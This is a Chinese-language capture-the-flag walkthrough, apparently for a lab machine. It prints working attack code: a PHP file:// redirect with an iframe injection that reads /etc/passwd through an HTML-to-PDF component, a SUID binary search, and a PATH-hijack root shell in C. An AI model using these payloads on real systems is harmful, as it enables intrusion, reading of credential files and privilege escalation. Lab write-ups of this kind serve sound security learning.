目录
半开扫描
nmap -sS ip
1.无法加载
80端口的资源无法被正常加载,因为一直在访问Google的某些站点,挂梯子访问。
源码地址给我们了
逐个查看,在install文件夹下出现了admin@1234
成功登录,左上角多了个功能
我们修改的资料会在资料版上原封不动的显示出来。用户名处不存在过滤,
不足以帮助我们突破边界
在文档属性中我们发现了一个应用。就是一个html转pdf的应用。
经过搜索,我们可以知道这个应用组件存在这三个漏洞。经过漏洞结合使用,来读取本地文件。
systemctl start apache2
cd /var/www/html
sudo vim 1.php
创建一个1.php文件
写入:
- <?php
- $file = $_GET['file'];
- header("location:file://$file");
<iframe src="http://ip/1.php?file=/etc/passwd" width="100%" height=1220></iframe>
成功读取/etc/passwd文件。可以看到gemini可以通过shell登录
保存到kali上
成功登录
find / -type f -user root -perm -u+xs -ls 2>/dev/null
strings /usr/bin/listinfo
内容:
核心代码也就是这几句,调用了系统的命令
vim date.c
内容:
- #include<sys/types.h>
- #include<unistd.h>
- #include<stdlib.h>
-
- int main(){
- setuid(0);
- setgid(0);
- system("/bin/bash");
- }
先从前面找,再从后面找
export PATH=/tmp:$PATH
提权成功
拿到flag.txt